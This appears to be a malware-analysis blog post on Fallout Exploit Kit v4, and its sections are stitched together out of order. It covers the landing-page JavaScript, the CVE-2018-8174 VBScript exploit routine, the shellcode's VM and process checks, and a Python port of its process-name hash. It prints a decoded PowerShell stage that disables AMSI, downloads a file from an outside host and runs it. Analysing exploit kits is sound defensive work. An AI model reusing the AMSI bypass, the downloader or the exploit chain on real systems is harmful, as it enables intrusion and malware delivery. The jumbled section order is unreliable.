<div id="BnjJbx"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle">
<param name="movie" value="/24_02_1964/05_04_1933/3410-Skegger-12666" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="false" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" /></object></div>
</body>
</html>
```

Thus, the SWF file that exploits CVE-2018-15982 is loaded and executed.

## CVE-2018-8174

The exploit code used is very similar to the PoC.
```vbscript
Sub StartExploit
  UAF
  InitObjects
  vb_adrr=LeakVBAddr()
  vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
  msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
  krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
  ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
  VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
  NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
  SetMemValue GetShellcode()
  ShellcodeAddr=GetMemValue()+8
  SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
  lIlll=GetMemValue()+69596
  SetMemValue ExpandWithVirtualProtect(lIlll)
  llIIll=GetMemValue()
  ExecuteShellcode
End Sub
StartExploit
```

The process to generate the shellcode is like this.

```vbscript
Function GetShellcode()
  ' the second Unescape argument is a several-KB %u-escaped shellcode string, omitted here
  IIlI=Unescape("%u0000%u0000%u0000%u0000") & Unescape("<%u-escaped shellcode omitted>" & lIIII(IIIII("")))
  ' pad the buffer with 0x4141 up to 0x80000 bytes
  IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
  GetShellcode=IIlI
End Function
```

Let’s read the shellcode.

## Shellcode

The decoding algorithm in the shellcode has not changed from v3 and remains RC4 (see Analysis of Fallout Exploit Kit v3: https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html). The API hash algorithm has not changed either: APIs are hashed with the dualaccModFFF1Hash algorithm.
```c
unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this)
{
  unsigned __int8 *v1; // ebx
  int v2; // edi
  unsigned int v3; // esi
  int i; // ecx
  unsigned int v5; // edx

  v1 = this;
  v2 = 1;
  v3 = 0;
  for ( i = zz_count(this); i; --i )
  {
    v5 = (v2 + (unsigned int)*v1++) % 0xFFF1;   // running sum of bytes, mod 65521
    v2 = v5;
    v3 = (v3 + v5) % 0xFFF1;                     // running sum of the running sums
  }
  return v2 + (v3 << 16);
}
```

However, there were interesting changes. Analysis-environment detection code has been added to the shellcode.

### VM Detection

It queries hypervisor presence using CPUID.

```c
unsigned int __thiscall zz_vm_detect(unsigned int *this)
{
  unsigned int *v1; // edi
  unsigned int result; // eax

  v1 = this;
  _EAX = 1;                // CPUID leaf 1
  __asm { cpuid }
  result = _ECX >> 31;     // ECX bit 31 is the hypervisor-present bit
  *v1 = _ECX >> 31;
  return result;
}
```

### Process Detection

It gets a list of running processes and converts each process name to lower case.

```c
int __cdecl zz_tolowercase(_BYTE *a1)
{
  int result; // eax

  while ( 1 )
  {
    result = (char)*a1;
    if ( !*a1 )
      break;
    if ( (char)*a1 >= 65 && (char)*a1 <= 90 )   // only ASCII 'A'..'Z' are folded
      *a1 += 32;
    ++a1;
  }
  return result;
}
```

The names are compared to the following hashes. Once again, it uses the dualaccModFFF1Hash algorithm.

```
0x3F5406DE
0x25CD0541
0x0F050309
0x161803EC
0x19F3044B
```

Two process names were identified. I do not know the others.

```
>>> hex(dualaccModFFF1Hash("wireshark.exe"))
'0x25cd0541'
>>> hex(dualaccModFFF1Hash("fiddler.exe"))
'0x19f3044b'
```

Like v3, the shellcode downloads, decodes and executes encrypted PowerShell code.

## PowerShell

The PowerShell code to be executed is like this.
```
powershell.exe -w hidden -noni -enc <Base64-encoded script omitted; decoded below>
```

Let’s decode and clean it.
```powershell
# AMSI is disabled by setting the private AmsiUtils.amsiInitFailed flag
try {
  $l1Il1 = [Ref].Assembly;
  $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils");
  $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static');
  $I1Il11l1Il.SetValue($null, $true);
} catch { };
# P/Invoke definition of CreateProcess with STARTUPINFO / PROCESS_INFORMATION structs
Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}";
# random 8-character .tmp name under %USERPROFILE%\AppData\LocalLow
$lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
$I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr';
$cli = (New-Object Net.WebClient);
$cli.Headers['User-Agent'] = 'J57P9y1i30M102X5';
$cli.DownloadFile($I1l11I1, $lll1IllI1);
$I1I1l1IIllI1 = New-Object lI1ll1Il1I1l;
$I1I1l1IIllI1.IlII1 = 0x0;
$I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1);
$IIl1Il1I = New-Object I1lII1Il1;
# launch the downloaded file; 0x00000008 is DETACHED_PROCESS
[l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null;
```

Thus the malware is downloaded and executed.
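Going back to the process-detection check in the shellcode section above: an added Python reimplementation (not the kit's code) of the lower-casing and hashing, with a constructed list of candidate tool names to resolve the five hashes. Comparing the routine with zlib.adler32 shows that dualaccModFFF1Hash is plain Adler-32.

```python
"""Added example (not the kit's code): the shellcode's process-name check,
reimplemented in Python. dualaccModFFF1Hash is Adler-32 (two accumulators
reduced mod 0xFFF1 = 65521, result b<<16 | a), so zlib.adler32 gives the same
values; the candidate process list below is constructed for illustration."""
import zlib

# the five hashes the shellcode compares process names against (from the page)
FALLOUT_PROCESS_HASHES = {0x3F5406DE, 0x25CD0541, 0x0F050309, 0x161803EC, 0x19F3044B}

# constructed candidate list of analysis tools to test against the hash list
CANDIDATE_PROCESSES = [
    "wireshark.exe", "Fiddler.exe", "procmon.exe", "procexp.exe", "ollydbg.exe",
    "x32dbg.exe", "x64dbg.exe", "windbg.exe", "idaq.exe", "tcpview.exe",
    "ProcessHacker.exe", "vboxservice.exe", "vmtoolsd.exe", "dumpcap.exe",
]


def dualacc_mod_fff1_hash(data: bytes) -> int:
    """Literal port of the decompiled routine: v2 = running sum, v3 = sum of v2."""
    v2, v3 = 1, 0
    for byte in data:
        v2 = (v2 + byte) % 0xFFF1
        v3 = (v3 + v2) % 0xFFF1
    return v2 + (v3 << 16)


def zz_tolowercase(name: str) -> str:
    """The shellcode's lower-casing only folds ASCII 'A'..'Z' by adding 32."""
    return "".join(chr(ord(c) + 32) if "A" <= c <= "Z" else c for c in name)


def process_name_hash(name: str) -> int:
    """Hash a process name the way the shellcode does: lower-case, then hash the bytes."""
    return dualacc_mod_fff1_hash(zz_tolowercase(name).encode("latin-1"))


def is_adler32(data: bytes) -> bool:
    """True when the ported routine agrees with the standard Adler-32 for this input."""
    return dualacc_mod_fff1_hash(data) == zlib.adler32(data)


def resolve_hashes(candidates=CANDIDATE_PROCESSES, hashes=FALLOUT_PROCESS_HASHES) -> dict:
    """Map each hash in the list to a candidate name producing it; unresolved hashes stay absent."""
    found = {}
    for name in candidates:
        h = process_name_hash(name)
        if h in hashes:
            found[h] = zz_tolowercase(name)
    return found


def process_check_triggers(running_processes) -> bool:
    """What the shellcode tests: does any running process name hash into the list?"""
    return any(process_name_hash(p) in FALLOUT_PROCESS_HASHES for p in running_processes)


if __name__ == "__main__":
    for h, name in sorted(resolve_hashes().items()):
        print(f"0x{h:08X} -> {name}")
    unresolved = FALLOUT_PROCESS_HASHES - set(resolve_hashes())
    print("unresolved:", [f"0x{h:08X}" for h in sorted(unresolved)])
```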
## Conclusion

Fallout has been heavily updated, making analysis very difficult. Very sophisticated techniques such as Diffie-Hellman key exchange, VM detection and process detection are now used. We need to stay careful, as it may be updated again in the future.
    <h2 id="first">First</h2> <p>We have been observing the Fallout Exploit Kit since August 2018. Fallout uses non-characteristic URLs and a heavily obfuscated landing page. Its users still exist and attacks are observed daily. Recently, we were investigating an attack campaign that delivers Raccoon Stealer through the flow PopAds -&gt; KeitaroTDS -&gt; Fallout.</p> <p>We have already written three reports about Fallout. The first covered the emergence of Fallout, the second its adoption of PowerShell, and the third its use of a PoC from GitHub. We divide these major changes by version and call them v1~3.</p> <ul> <li><a href="https://nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a></li> <li><a href="https://nao-sec.org/2019/01/in-depth-analysis-of-new-fallout.html">In-Depth analysis of new Fallout Exploit Kit</a></li> <li><a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a></li> </ul> <p>We wrote about v3 in March 2019. v3 was not stable and was updated to the next version immediately. 
@EKFiddle (created and maintained by @jeromesegura) reported this change on April 11.</p> <blockquote class="twitter-tweet" data-lang="ja"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/EKFiddle?src=hash&amp;ref_src=twsrc%5Etfw">#EKFiddle</a> [Regex update]: <a href="https://twitter.com/hashtag/FalloutEK?src=hash&amp;ref_src=twsrc%5Etfw">#FalloutEK</a><br />Seems like there is no more use of the PoC on GitHub for CVE-2018-8174.<br />Pushing <a href="https://twitter.com/hashtag/GandCrab?src=hash&amp;ref_src=twsrc%5Etfw">#GandCrab</a> in this particular instance.<a href="https://t.co/U67qZosp1e">https://t.co/U67qZosp1e</a> <a href="https://t.co/buVTakYuhJ">pic.twitter.com/buVTakYuhJ</a></p>&mdash; EKFiddle (@EKFiddle) <a href="https://twitter.com/EKFiddle/status/1116134534989238272?ref_src=twsrc%5Etfw">April 11, 2019</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <p>We call this big update v4 (it is still v4). No detailed analysis report has been written about what this update changed in Fallout, but the update is very big; at least for us, as Exploit Kit analysts, it made the analysis very cumbersome. Fallout v4 incorporates the following features.</p> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">1.</span> Diffie-Hellman key exchange
<span class="p">2.</span> VM detection
<span class="p">3.</span> Process detection
</code></pre></div></div> <p>Here we share our detailed analysis of the updates made in Fallout v4. Unfortunately, we did not understand everything; if you know more, please help us.</p> <h2 id="traffic-chain">Traffic chain</h2> <p>First, let’s look at the previous traffic chain. 
v1~3 was like this.</p> <p><img src="https://4.bp.blogspot.com/-eXpYD_rUFwU/W4loVPM1TTI/AAAAAAAAAVI/XuE3p36q7QMAVw95gBYPkKOA-IhsdaoAQCLcBGAs/s1600/0.png" alt="" /> <img src="https://3.bp.blogspot.com/-_qnvJOfIOeE/XEiKt9Zs16I/AAAAAAAAAYI/tspkgYcwxe0YjeGhaTGofsUBpfmhjJzmwCLcBGAs/s1600/0.png" alt="" /> <img src="https://nao-sec.org/assets/2019-03-07/01.png" alt="" /></p> <p>In v3, it acquired the CVE-2018-8174 PoC from GitHub and attacked by rewriting only the shellcode part. So what does the v4 traffic chain look like?</p> <p><img src="https://nao-sec.org/assets/2019-07-09/01.png" alt="" /></p> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">1.</span> Landing Page
<span class="p">2.</span> JavaScript Code
<span class="p">3.</span> Encoded Code 1
<span class="p">4.</span> Encoded Code 2 (CVE-2018-8174 + SWF Loader)
<span class="p">5.</span> CVE-2018-15982
<span class="p">6.</span> PowerShell Code
<span class="p">7.</span> Malware
</code></pre></div></div> <p>In this way, an attack is carried out over seven traffic stages. Let’s look at each one in order. (In the following, we will use different traffic data from the above. 
The detailed reason will be given later, but it is difficult to capture and analyze traffic at the same time.)</p> <h2 id="landing-page--js-code--encoded-data">Landing Page + JS Code + Encoded Data</h2> <p>The landing page first loads JavaScript code.</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;meta</span> <span class="na">http-equiv=</span><span class="s">"x-ua-compatible"</span> <span class="na">content=</span><span class="s">"IE=10"</span><span class="nt">&gt;</span>
<span class="nt">&lt;script </span><span class="na">type=</span><span class="s">"text/javascript"</span> <span class="na">src=</span><span class="s">"/04_09_2003/Symposium?Peristele=02_03_1943&amp;LE3r=Aps&amp;ILZhH=Frazzling-Anorexias"</span><span class="nt">&gt;&lt;/script&gt;</span>
<span class="nt">&lt;/head&gt;</span>
</code></pre></div></div> <p>This script includes obfuscated CryptoJS and BigInteger libraries. 
Excluding the large library parts, there is very little processing.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// key</span> <span class="nb">window</span><span class="p">.</span><span class="nx">III1l1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">IIIlI</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">II1I1lI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">ll1llI1</span><span class="dl">"</span><span class="p">](</span><span class="dl">"</span><span class="s2">8b69cbdfc5fe43e69b7920c8ee721fc9</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// iv</span> <span class="nb">window</span><span class="p">.</span><span class="nx">II1ll11I</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">IIIlI</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">II1I1lI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">ll1llI1</span><span class="dl">"</span><span class="p">](</span><span class="dl">"</span><span class="s2">301ae8205ddcd5897df69e3b0c056c34</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// aes_decrypt(enc_data, key, iv)</span> <span class="nb">window</span><span class="p">.</span><span class="nx">l11llIll</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span 
class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">lI11lIl</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">l11II11l</span><span class="dl">"</span><span class="p">](</span><span class="dl">"</span><span class="s2">p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy</span><span class="dl">"</span><span class="p">,</span> <span class="nx">III1l1</span><span class="p">,</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">II1ll11I</span> <span class="p">})[</span><span class="dl">"</span><span class="s2">lIlIlll11l</span><span class="dl">"</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">IIIlI</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">Il11I1II</span><span class="dl">"</span><span class="p">]);</span> </code></pre></div></div> <p>First, two values (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) appear. These are the key and the IV for AES. By decrypting the following Base64 string with this key and IV, the necessary data (specifically, the URL for acquiring the encoded data used in the next step) is obtained. Decrypting it gives this.</p> <p><img src="https://nao-sec.org/assets/2019-07-09/02.png" alt="" /></p> <p>Next is the process of checking which browser is being used. 
Depending on it, Opera, Firefox, IE or Chrome is investigated.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// check browser</span> <span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">String</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">prototype</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">II1l1IlI</span><span class="dl">"</span><span class="p">]</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="p">(</span><span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">opr</span><span class="dl">"</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">opr</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">addons</span><span class="dl">"</span><span class="p">]</span> <span class="o">||</span> <span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">opera</span><span class="dl">"</span><span class="p">]</span> <span class="o">||</span> <span class="nb">navigator</span><span class="p">[</span><span class="dl">"</span><span class="s2">userAgent</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">indexOf</span><span class="dl">"</span><span class="p">](</span><span class="dl">"</span><span class="s2"> OPR/</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="k">this</span> <span 
class="o">+</span> <span class="p">(</span><span class="k">typeof</span> <span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">InstallTrigger</span><span class="dl">"</span><span class="p">]</span> <span class="o">!==</span> <span class="dl">"</span><span class="s2">undefined</span><span class="dl">"</span><span class="p">)</span> <span class="o">+</span> <span class="k">this</span> <span class="o">+</span> <span class="p">(</span><span class="kc">false</span> <span class="o">||</span> <span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">document</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">documentMode</span><span class="dl">"</span><span class="p">])</span> <span class="o">+</span> <span class="k">this</span> <span class="o">+</span> <span class="p">(</span><span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">chrome</span><span class="dl">"</span><span class="p">]</span> <span class="o">&amp;&amp;</span> <span class="o">!!</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">chrome</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">runtime</span><span class="dl">"</span><span class="p">])</span> <span class="p">};</span> </code></pre></div></div> <p>Then there is a process to check the version of Adobe Flash Player. 
This data will be used later.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="kd">function</span> <span class="p">()</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">l1l111I</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="k">try</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">l1l111I</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="dl">'</span><span class="s1">ShockwaveFlash.ShockwaveFlash</span><span class="dl">'</span><span class="p">).</span><span class="nx">getVariable</span><span class="p">(</span><span class="dl">'</span><span class="s1">$version</span><span class="dl">'</span><span class="p">)</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span> <span class="p">})();</span> </code></pre></div></div> <p>The process then returns to the landing page. In the landing page, one function is defined and executed. 
Let’s look at that function.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// str_A</span> <span class="kd">var</span> <span class="nx">l1ll1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]();</span> <span class="c1">// str_B</span> <span class="kd">var</span> <span class="nx">lIlII11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span> <span class="mi">16</span><span class="p">);</span> <span class="c1">// str_C</span> <span class="kd">var</span> <span class="nx">ll1l1IlIIIll</span> <span 
class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span> <span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D</span> <span class="kd">var</span> <span class="nx">lll1II</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span> <span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E =&gt; str_B.modPow(str_C, str_D)</span> <span class="kd">var</span> <span class="nx">l11IlIl</span> <span 
class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span> <span class="nx">lll1II</span><span class="p">);</span> </code></pre></div></div> <p>Here, expressions such as <code class="language-plaintext highlighter-rouge">window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']()</code> appear many times. This is a CryptoJS call that generates a random 32-character hexadecimal string. After generating four random values, the second, third and fourth of them are used to generate a fifth; modPow is used for this. The five values prepared here are used in the cryptographic process that follows. We call them str_A, str_B, str_C, str_D and str_E.</p> <p>The code that follows is divided into three parts: the first is the <code class="language-plaintext highlighter-rouge">onreadystatechange</code> handler, which runs after the request has been sent to the server; the second generates the data to be sent; the third sends it. These are the standard XMLHttpRequest POST steps. 
First, let’s look at the process of generating transmission data.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">l11IlIIlllll</span> <span class="o">=</span> <span class="p">{};</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlII11</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_B</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lll1II</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lll1II</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">l11IlIl</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l11IlIl</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lI1lIl1Ill</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l1ll1</span><span class="p">;</span> <span class="c1">// str_A</span> <span class="c1">// browser check data</span> <span class="nx">l11IlIIlllll</span><span 
class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">@@</span><span class="dl">'</span> <span class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]();</span> </code></pre></div></div> <p>Five values have been added to the object <code class="language-plaintext highlighter-rouge">l11IlIIlllll</code>. All but the last are the random values created earlier: of the five random values, all except str_C are included in the data to be sent. The last is the browser check data generated earlier; it holds true or false for whether the browser is Opera, Firefox, IE or Chrome, respectively, joined with <code class="language-plaintext highlighter-rouge">@@</code>. This is the data prepared for sending. Note that str_C is not sent to the server.</p> <p>Next, let’s look at the sending process.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">I1l1I1</span><span class="dl">'</span><span class="p">](</span><span class="nx">Il1I11l</span><span class="p">,</span> <span class="dl">"</span><span class="s2">post</span><span class="dl">"</span><span class="p">,</span> <span class="nx">l11llIll</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="cm">/* -- snip -- */</span> <span class="c1">// Send POST</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1lllIIlI</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">,</span> <span class="c1">// aes_encrypt(data, key, iv)</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span 
class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Ill1lI1Ill</span><span class="dl">'</span><span class="p">](</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">IIII1Il</span><span class="dl">'</span><span class="p">](</span><span class="nx">l11IlIIlllll</span><span class="p">),</span> <span class="c1">// post request data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]</span> <span class="p">}</span> <span class="c1">// iv</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]()</span> <span class="p">);</span> </code></pre></div></div> <p>This is also a general request sending process. The URL is a string decoded by AES earlier. The data to be sent is the previously prepared data, but these are encrypted by AES. The key and IV are the same as those used to decode the URL. 
